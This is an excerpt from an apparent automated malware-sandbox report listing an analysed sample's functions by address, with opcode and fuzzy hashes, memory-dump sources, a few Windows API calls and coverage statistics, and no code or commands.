Opcode ID: 18af566cf80e032bb39d0923ce1fdf0c96d8bd884cb548bb0b33d820883fe07f
Instruction ID: f2e75fd1bf683b3fc72198eb86a3a5907ea4e8cf43dba23e2f0bce1a97204dcb
Opcode Fuzzy Hash: 18af566cf80e032bb39d0923ce1fdf0c96d8bd884cb548bb0b33d820883fe07f
Instruction Fuzzy Hash: EC21A3742002108FCF32EB38F984B5937A5EB66319F105AA5D00EDB66DE638DCC48B90

Function 00E44F38 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9716d08ffc8e53f317e28a487e27ab2a4bb3e8bf66e11a0a4468ae57325cc880
Instruction ID: 47649a46d19c51ef56605b1d8327c4039df7cfbb751a9b875eb80d45aae3cb8f
Opcode Fuzzy Hash: 9716d08ffc8e53f317e28a487e27ab2a4bb3e8bf66e11a0a4468ae57325cc880
Instruction Fuzzy Hash: BC212674700206CFCB64EB78E558B9D7BF1AF89304B2018A9E406EB3A1DB329D44CB60

Function 00DBD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2941909340.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_dbd000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a183d6c7efc3f5436b8245720273988f35f2e76ec6f9f26dba22ddb689f9472f
Instruction ID: a686c7f38c420c7a4634ff918b3945ecd5634cf2e03fc04a212f1b0ba2550e69
Opcode Fuzzy Hash: a183d6c7efc3f5436b8245720273988f35f2e76ec6f9f26dba22ddb689f9472f
Instruction Fuzzy Hash: B621D0B5604204DFCB14EF14D9C4B66BBA6EB94314F24C66DE84A4A292D33AD846CB72

Function 00DBD005 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2941909340.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_dbd000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb7f1083ea7f944e0233d7e0704c5851d0e723bc9bc6b0f8daa75f99560a44c
Instruction ID: cf9153adc56c35f0bd9bc032934db1b1d88f01a8e232c980f6a9d3d2a0c989c8
Opcode Fuzzy Hash: 8cb7f1083ea7f944e0233d7e0704c5851d0e723bc9bc6b0f8daa75f99560a44c
Instruction Fuzzy Hash: 54215C7150D3C09FCB03DB24D9A4711BF71AB46214F29C5DBD8898F2A7D23A980ACB62

Function 00E4182A Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4676a950048f346bc7a6d53d6c016352f5ddc6f2c9017e7a1ed95ec67fa68aa3
Instruction ID: b829dd0c4dc07ed0e6321e3234968daf47fc94795d1cf97a42db3ed4673bcfab
Opcode Fuzzy Hash: 4676a950048f346bc7a6d53d6c016352f5ddc6f2c9017e7a1ed95ec67fa68aa3
Instruction Fuzzy Hash: BE212C30B002458FDF68EB74D5546AD77F2AF89345F1004ADD406FB291DB369D81DB51

Function 00E49140 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0579a50cf5759521f03eea9839931fad9598152a5f817464cc6363b27e151f
Instruction ID: f4e632f14d85e27373588844e860c657e7bdf882e5ecadbfaf6b2f5fbffb13d1
Opcode Fuzzy Hash: 5f0579a50cf5759521f03eea9839931fad9598152a5f817464cc6363b27e151f
Instruction Fuzzy Hash: D5219234E0021A9BCB08CFA4E9549DFF7B2AF89310F11852AE815FB351DBB09C41CB50

Function 00E41838 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2b296d5ff92a3d1113c959e90001972c8647263e596940349341eee7b2ad276
Instruction ID: 40d1f4a9484d763c5bd2e701a79a4af6c7db00f140af3863982ac4939b9db8a2
Opcode Fuzzy Hash: f2b296d5ff92a3d1113c959e90001972c8647263e596940349341eee7b2ad276
Instruction Fuzzy Hash: 49212A30B002058FDF68EB74D5146AE77F6AB89345F1008A9D406FB290DF369D80CBA1

Function 00E41660 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa98c7d2f0f9ea00a394b0f88ef52bc6c65d70e4bdd074a8b3424f313b4df12c
Instruction ID: a1ac98e58e22f5109bce93b0ee213f3a44770d48bdd62b7b88ec95cabeec8f12
Opcode Fuzzy Hash: aa98c7d2f0f9ea00a394b0f88ef52bc6c65d70e4bdd074a8b3424f313b4df12c
Instruction Fuzzy Hash: 332142742002114FDF31EB28FA84B593796EB65719F105AA5E00EDBA5DE638DCC48B91

Function 00E44F48 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddae4ebabf53fcdfa7dbf5dab5679af2a395246e9504fb917ad48f447361fcde
Instruction ID: d2b487060112c3ecd227d56798fb9c5c2a7bd79889518a2d23e357ff2d8f985a
Opcode Fuzzy Hash: ddae4ebabf53fcdfa7dbf5dab5679af2a395246e9504fb917ad48f447361fcde
Instruction Fuzzy Hash: 52212874700606CFCB64EB78E958B9D7BF1AF89304F1014A9E406EB3A1DB329D40CBA1

Function 00E40838 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d84376267205e0f661a370015330e12c2fda280ecbcbfc56c49175cb3498c296
Instruction ID: cc796448806eda8d812f1491446036926241d983cba5c87b09039f2bf34ec45c
Opcode Fuzzy Hash: d84376267205e0f661a370015330e12c2fda280ecbcbfc56c49175cb3498c296
Instruction Fuzzy Hash: AE11E330B043004FEF695B74F64036D37A1EBAA318F105979E20AEF282DA35CD858BC1

Function 00E40848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ece1101e454c2a31b9ca50de9a0a3bc4f83ac9143bddc0c3e67538155424cdb
Instruction ID: e64d4766f1220edcc25f36340c110999a79442f2265bc4c5988cc0497bc17691
Opcode Fuzzy Hash: 4ece1101e454c2a31b9ca50de9a0a3bc4f83ac9143bddc0c3e67538155424cdb
Instruction Fuzzy Hash: AE11A331B102048FEF68AA79F64436D3295EB99319F209939E20AEF241DA74DD818BC1

Function 00E41438 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3145185de1c22d36084b74e559b157a761548fec3f6d4af1692f252b44824f23
Instruction ID: 242b6c88fd0272e8bc5bed79b6f11f294e99e4860a40d54366ae0b0215630045
Opcode Fuzzy Hash: 3145185de1c22d36084b74e559b157a761548fec3f6d4af1692f252b44824f23
Instruction Fuzzy Hash: BB11C231E003158FCF61EFB8A4512AE7BF5EF48354B6014B9D805F7241E73AC8868BA1

Function 00E41772 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1953bd79ec8bf93550bec0b1381a059679ac108895be99995a0804070993fe0e
Instruction ID: c4defab5321499c81299ade77ce5c234420ed81ba14c1599e75fc45ccd15ae0c
Opcode Fuzzy Hash: 1953bd79ec8bf93550bec0b1381a059679ac108895be99995a0804070993fe0e
Instruction Fuzzy Hash: 95110271F102009FCF60AF78A94866E7BF9FB89750B104975E905D3308EB34D946CB91

Function 00E41448 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df5851a1a9b151128e4ae8b9583c81b39d74ff6e4168f62f77ba02bc6ead52c
Instruction ID: 57ce40eeb7e69ac3dbdac161fc7dc9dc25defa8743c2d7d573e0e59484a45690
Opcode Fuzzy Hash: 7df5851a1a9b151128e4ae8b9583c81b39d74ff6e4168f62f77ba02bc6ead52c
Instruction Fuzzy Hash: 56018431F003158FCF61EFB8945119DB7F5EF48354B5014B9D905F7241E635D88287A1

Function 00E47040 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4cd4056f09364315da593c6e6c180193b70547249bae107a3925b35e1d73512
Instruction ID: 69264861afa15e72e1d33fc6032bc584ac06b43b81120a97f9f63824c6f6dfd1
Opcode Fuzzy Hash: c4cd4056f09364315da593c6e6c180193b70547249bae107a3925b35e1d73512
Instruction Fuzzy Hash: 7C012938B00114CFC768EB78D698A6D7BF2EF88715B1441A8E506DB378CB349D42CB40

Function 00E414D4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6016ffbc4b76f46c2aad1b50726cde7c2d63e34ae3cb4b1148eaacb252f6c484
Instruction ID: 7228e61a256f59a655008b624ba76a570e38e7f94583282940666481a5f63a98
Opcode Fuzzy Hash: 6016ffbc4b76f46c2aad1b50726cde7c2d63e34ae3cb4b1148eaacb252f6c484
Instruction Fuzzy Hash: 60F02B33A04210CFDF218BB8A4912EC7BF0EE9436175960E7D859FB652D738D882C751

Function 00E480D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1725a3ef77d8bb3e377fcfd48ea03863432aa5b1b5bb4717794d4dd9e6202b7b
Instruction ID: b1b4f5289e4ec6e144843e1a11305cb5504c12f438fc7c16e22dd84ab3a2b5e8
Opcode Fuzzy Hash: 1725a3ef77d8bb3e377fcfd48ea03863432aa5b1b5bb4717794d4dd9e6202b7b
Instruction Fuzzy Hash: 4B01DB706142699FCB56E778F65199D3FB1DF91305B1047A8D00D4F1AAEE341A06C781

Function 00E480E0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2942436412.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e40000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddfe367ad81f045eefd481291bbac54aff0eb89b99b547eef0e3fffb030deddb
Instruction ID: b16b05fbaced5228a14c630ef178b980e62b65cd64d67b3e02cd46903a5ee37a
Opcode Fuzzy Hash: ddfe367ad81f045eefd481291bbac54aff0eb89b99b547eef0e3fffb030deddb
Instruction Fuzzy Hash: 47F03174A00229AFCB51FBA8FA40A5D7BF1EF90305F504668D00C97258EE302E44CB91

Analysis Process: eFzAvsOm.exePID: 7936, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	41
Total number of Limit Nodes:	2

Executed Functions

Function 070081F0 Relevance: 3.9, Strings: 3, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hhq, xrefs: 070082BF
Hhq, xrefs: 07008349
Hhq, xrefs: 07008304

Memory Dump Source

Source File: 0000000A.00000002.1821740637.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: Hhq$Hhq$Hhq
API String ID: 0-327223379
Opcode ID: 7d6165ff17243ec2bb2f71c19457c2be65281f21fede9d4a3baada37e0c04d3c
Instruction ID: f660d5148ad38a3418a16cd26bfe172bdbaea9d9000febf95986c45a657c15d3
Opcode Fuzzy Hash: 7d6165ff17243ec2bb2f71c19457c2be65281f21fede9d4a3baada37e0c04d3c
Instruction Fuzzy Hash: EC41C1B43006418BEB69AB79842462E7AE7BFC5310B54897DD516CB7D0EF68DC02C762

Function 07002C88 Relevance: 2.9, Strings: 2, Instructions: 380
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hhq, xrefs: 07002D4A
Hhq, xrefs: 07002DD1

Memory Dump Source

Source File: 0000000A.00000002.1821740637.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7000000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: Hhq$Hhq
API String ID: 0-2450388649
Opcode ID: c67d96d9bca9bd8d26a41a9533ec14136a266e2fd3a18407278da45ddc9dbdd6
Instruction ID: 0b48a65cb40087f3e40124d0cf066788312b322054ffcb91eaea8af2703e601a
Opcode Fuzzy Hash: c67d96d9bca9bd8d26a41a9533ec14136a266e2fd3a18407278da45ddc9dbdd6
Instruction Fuzzy Hash: 92E1A074A003588FDB15DF74C8546AEBBB6FF89310F1485AEE449AB351EB309E42CB91

Function 057C80A0 Relevance: 2.7, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 057C80EE
, xrefs: 057C80E7

Memory Dump Source

Source File: 0000000A.00000002.1821457375.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_57c0000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: fd613166106031cbbe641344f16a59bdae565a8549fa508e668e6f6c1e3c57ca
Instruction ID: 29bdeffb6c9714fd95ed872e566d3778824b0dd0c00bd1c978c42cbbbf3d9331
Opcode Fuzzy Hash: fd613166106031cbbe641344f16a59bdae565a8549fa508e668e6f6c1e3c57ca
Instruction Fuzzy Hash: 9971CF31910701CFDB01EF28D486655BBB5FF95308B558AA9D849AF326EB71E898CF80

Function 057C7654 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 057C80EE
, xrefs: 057C80E7

Memory Dump Source

Source File: 0000000A.00000002.1821457375.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_57c0000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 6c40139191748854cb23de31ea014e0393f7b695c824845f23c519e496785521
Instruction ID: 17ed7724bfd7cde1ba4868f2732e356d5f75195206c07855f397b5193e3dcee3
Opcode Fuzzy Hash: 6c40139191748854cb23de31ea014e0393f7b695c824845f23c519e496785521
Instruction Fuzzy Hash: B561CF31910701CFDB00EF28D485655BBB5FF85308B558AA9D849AB316EB71F898CF80

Function 07056140 Relevance: 2.6, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8hq, xrefs: 070561D3
8hq, xrefs: 0705619C

Memory Dump Source

Source File: 0000000A.00000002.1822088931.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7050000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: 8hq$8hq
API String ID: 0-601589740
Opcode ID: 1f32594518c0dff162b1d6b031e51e13f7248c0623fcb3e0b2301a03f67a379f
Instruction ID: 7a8c0d97f7591315ca71ce6dfaedb4f11f6853cc3fdfbd52a721b734b28eafcf
Opcode Fuzzy Hash: 1f32594518c0dff162b1d6b031e51e13f7248c0623fcb3e0b2301a03f67a379f
Instruction Fuzzy Hash: 09212774B10218CFCB449A78D805A7F76FAEBC9711F54462AE906DB381DF358D008796

Function 02BFAEC3 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02BFB11E

Memory Dump Source

Source File: 0000000A.00000002.1817249329.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bf0000_eFzAvsOm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bb8c7eb48138d2464f8cb64714f8238e36936b981e4883b496a488cb7fb16433
Instruction ID: 68090e3347299f4aad64f7ff2459e67b100e27bfc68888818b00af3612ae6c2b
Opcode Fuzzy Hash: bb8c7eb48138d2464f8cb64714f8238e36936b981e4883b496a488cb7fb16433
Instruction Fuzzy Hash: FC8157B1A00B058FD768DF29D44475ABBF1FF88304F008A6DE58ADBA50D775E949CB90

Function 02BF591C Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02BF59D9

Memory Dump Source

Source File: 0000000A.00000002.1817249329.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bf0000_eFzAvsOm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 382315cf3ad88bddaa47846d5030ef46d4bd5a9e285f4f79eff749c03a93836a
Instruction ID: 6bb55e2559144034ed394551fe1934751e16f2fa8a1c8aafd4d9c661b7e78ea4
Opcode Fuzzy Hash: 382315cf3ad88bddaa47846d5030ef46d4bd5a9e285f4f79eff749c03a93836a
Instruction Fuzzy Hash: 064100B5C00719CADB24CFA9C884BDEBBB1FF49304F2480AAD509AB251DB75694ACF51

Function 02BF4514 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02BF59D9

Memory Dump Source

Source File: 0000000A.00000002.1817249329.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bf0000_eFzAvsOm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 61e877905d06db7a3b8e39db08d1cd42775424e49e0b6bbb7f1ec2d9d66b9632
Instruction ID: 218fa16c6c439a0908b89d4bac1782857b2fb68e360f19da0e512f72b97dcf18
Opcode Fuzzy Hash: 61e877905d06db7a3b8e39db08d1cd42775424e49e0b6bbb7f1ec2d9d66b9632
Instruction Fuzzy Hash: 3C41EFB0C0071DCADB24CFA9C884B9EBBB5FF48304F6080AAD519AB251DB756949CF91

Function 02BFD0FC Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BFD76E,?,?,?,?,?), ref: 02BFD82F

Memory Dump Source

Source File: 0000000A.00000002.1817249329.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bf0000_eFzAvsOm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 104e4bf1f32155d1c9f22ca0cbfcf48146ef4e0dcc4c35abc5c4b2633d8b518d
Instruction ID: e8f0750c39bf29e15a7b9c8b3f62bc1114b0ca4e1f5127b3da7e5f0fd72bce66
Opcode Fuzzy Hash: 104e4bf1f32155d1c9f22ca0cbfcf48146ef4e0dcc4c35abc5c4b2633d8b518d
Instruction Fuzzy Hash: C52103B5900209AFDB10CF9AD884ADEFBF5EB48310F14805AE918A3311D374A954CFA0

Function 02BFD7A0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BFD76E,?,?,?,?,?), ref: 02BFD82F

Memory Dump Source

Source File: 0000000A.00000002.1817249329.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bf0000_eFzAvsOm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c3e538647e6876522dfd93234983dada03769e95528b539777b9728dc8e980e7
Instruction ID: d891db844ad1ce70d52e00cd12fef3d846143874284f53031cef642b87838a8e
Opcode Fuzzy Hash: c3e538647e6876522dfd93234983dada03769e95528b539777b9728dc8e980e7
Instruction Fuzzy Hash: 1F21E0B6D00249DFDB10CFAAD984ADEBBF5EB48310F14805AE918B3351D378A954CF60

Function 0701A1F8 Relevance: 1.5, APIs: 1, Instructions: 48
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetTimer.USER32(?,02CA6428,?,?,?,?,?,?,0701A0B0,00000000,00000000,?), ref: 0701A25D

Memory Dump Source

Source File: 0000000A.00000002.1821799918.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7010000_eFzAvsOm.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 7af5c6f0c7681be1d0af381879b121d3491ce845ebcfe5a888f4df084e33a29a
Instruction ID: 8cb7a05976b1c2643706e0c797c8b7047dd04cb77669c980d1e1121a8743481f
Opcode Fuzzy Hash: 7af5c6f0c7681be1d0af381879b121d3491ce845ebcfe5a888f4df084e33a29a
Instruction Fuzzy Hash: 2511D2B58002499FDB10DF9AC885BDEBBF8FB48310F20845AD959B3211D375A685CFA5

Function 02BFB0B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02BFB11E

Memory Dump Source

Source File: 0000000A.00000002.1817249329.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bf0000_eFzAvsOm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 689766761b2f4a0b7c4f28792bf553bf566c70ae4545f2c80b71482372a399b0
Instruction ID: 225f9664c69a35ab5f35c17974435f120a8f3c2ff7f1c67147aa21e2de664609
Opcode Fuzzy Hash: 689766761b2f4a0b7c4f28792bf553bf566c70ae4545f2c80b71482372a399b0
Instruction Fuzzy Hash: 001110B6C003498FCB10CF9AC848ADEFBF4EB88324F14845AD519B7210C375A649CFA1

Function 070188D8 Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,02CA6428,?,?,?,?,?,?,0701A0B0,00000000,00000000,?), ref: 0701A25D

Memory Dump Source

Source File: 0000000A.00000002.1821799918.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7010000_eFzAvsOm.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 37379bfe733608f14f4da45229cb3cf9eb5b0723f14305d0cd44f1361984bdc9
Instruction ID: 6e21ec14add0f325ad0646b03553d9d81df47e7b0df73ff230ee69f0b04ffdfa
Opcode Fuzzy Hash: 37379bfe733608f14f4da45229cb3cf9eb5b0723f14305d0cd44f1361984bdc9
Instruction Fuzzy Hash: 2811F2B59003499FDB10DF9AC889BDEBBF8EB48320F10845AE519B7251C375A944CFA5

Function 0701A290 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,02CA6428,?,?,?,?,?,?,0701A0B0,00000000,00000000,?), ref: 0701A25D

Memory Dump Source

Source File: 0000000A.00000002.1821799918.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7010000_eFzAvsOm.jbxd

Similarity

API ID: Timer
String ID:
API String ID: 2870079774-0
Opcode ID: 02b8d18743bbc483bbfbb251a46356334b4a9858fa4215a236277d62e8465639
Instruction ID: 69ab80e91afb361ef7539fb409ae97eaa7207ee2486e661143b945f646fd25ed
Opcode Fuzzy Hash: 02b8d18743bbc483bbfbb251a46356334b4a9858fa4215a236277d62e8465639
Instruction Fuzzy Hash: 110126F2D093C58ECB128FA8D8547E9BFF0AF66210F1985CBC584A7143C2790149CB61

Function 0705C6D8 Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

r, xrefs: 0705C8BB

Memory Dump Source

Source File: 0000000A.00000002.1822088931.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7050000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 5c15a8c07f83f5952a4dcdbc725328e67a434c554cc0d7508200f1fbc8dc2caf
Instruction ID: 7ac76c56c04b5bd7f5355fac27c8aed65403102b6c6d447feb5904f9c7b43204
Opcode Fuzzy Hash: 5c15a8c07f83f5952a4dcdbc725328e67a434c554cc0d7508200f1fbc8dc2caf
Instruction Fuzzy Hash: BD916DB491520ADFD704CF69D8459FFBBB9FF4A301F109255E81AAB211D734A981CFA0

Function 07050040 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

(hq, xrefs: 070501DD

Memory Dump Source

Source File: 0000000A.00000002.1822088931.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7050000_eFzAvsOm.jbxd

Similarity

API ID:
String ID: (hq
API String ID: 0-4060669308
Opcode ID: fe8fce04b169ac8dba133f048748e955fa4483bf6b3370f18856bfda3458a164
Instruction ID: f86183f7581fd2aba453007785170ddee42508eb2e5647b83d8db10597be24f8
Opcode Fuzzy Hash: fe8fce04b169ac8dba133f048748e955fa4483bf6b3370f18856bfda3458a164
Instruction Fuzzy Hash: F371B1B06003059FDB24DF79C854BAFBBE6EF88311F108A2AE80697790DF749941CB91

Function 070017B0 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

(hq, xrefs: 070037B7

Memory Dump Source

